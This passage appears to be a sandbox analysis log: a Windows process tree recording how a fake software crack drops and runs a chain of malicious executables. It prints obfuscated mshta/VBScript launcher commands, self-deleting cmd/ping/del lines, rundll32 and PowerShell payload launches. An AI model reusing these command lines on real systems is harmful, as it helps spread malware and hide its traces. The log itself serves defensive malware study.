                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8700 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:6156
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8480 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:4376
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8368 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:408
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8480 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:5492
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:4816
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:6504
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9072 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:4844
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:5992
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1636 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:2632
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7544 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:6192
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7536 /prefetch:8
                                                                                                                                            2⤵
                                                                                                                                              PID:5512
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7596 /prefetch:8
                                                                                                                                              2⤵
                                                                                                                                                PID:2152
                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                              1⤵
                                                                                                                                                PID:2936
                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2688
                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                1⤵
                                                                                                                                                  PID:2532
                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2484
                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1468
                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1392
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:1224
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1104
                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                          1⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          PID:1028
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\swvhtge
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\swvhtge
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            PID:6424
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:5720
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              PID:5036
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\swvhtge
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\swvhtge
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            PID:3436
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:4564
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\atvhtge
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              PID:4940
                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:60
                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1816
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:4160
                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5512
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5656
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5844
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                      keygen-pr.exe -p83fsase3Ge
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5912
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4584
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1084
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                        keygen-step-1.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5952
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                                        keygen-step-5.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5988
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4796
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2272
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                                                                                                                                                                  MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5312
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:5420
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:1036
                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                        "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                        PID:5632
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /F -iM "keygen-step-5.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:5452
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                                keygen-step-2.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                PID:6004
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\57E5.tmp.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\57E5.tmp.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:4804
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\57E5.tmp.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4928
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:5096
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5296
                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:5372
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                                    keygen-step-3.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:6012
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5104
                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:5388
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                                      keygen-step-4.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:4772
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:4808
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4128
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:5116
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5512
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-V0FTS.tmp\Install.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-V0FTS.tmp\Install.tmp" /SL5="$3032E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:708
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-A5Q8O.tmp\Ultra.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-A5Q8O.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:1840
                                                                                                                                                                                            • C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe
                                                                                                                                                                                              "C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:6140
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-05MOP.tmp\ultramediaburner.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-05MOP.tmp\ultramediaburner.tmp" /SL5="$30234,281924,62464,C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                PID:5068
                                                                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:4404
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\b1-934d2-2b5-11d88-2e55987797e17\ZHogaefedaeqi.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\b1-934d2-2b5-11d88-2e55987797e17\ZHogaefedaeqi.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              PID:224
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7f-918ad-c07-2ca85-dea4a1025d986\Qepirewoby.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7f-918ad-c07-2ca85-dea4a1025d986\Qepirewoby.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4312
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe & exit
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5860
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe & exit
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:5648
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      PID:5744
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe & exit
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:208
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe & exit
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:4680
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:4036
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                            PID:6984
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1619212869004.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1619212869004.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619212869004.txt"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6724
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:6512
                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                  ping 127.0.0.1 -n 3
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                  PID:6584
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe & exit
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:5352
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6000
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe /S
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:5904
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6768
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:5776
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:2836
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
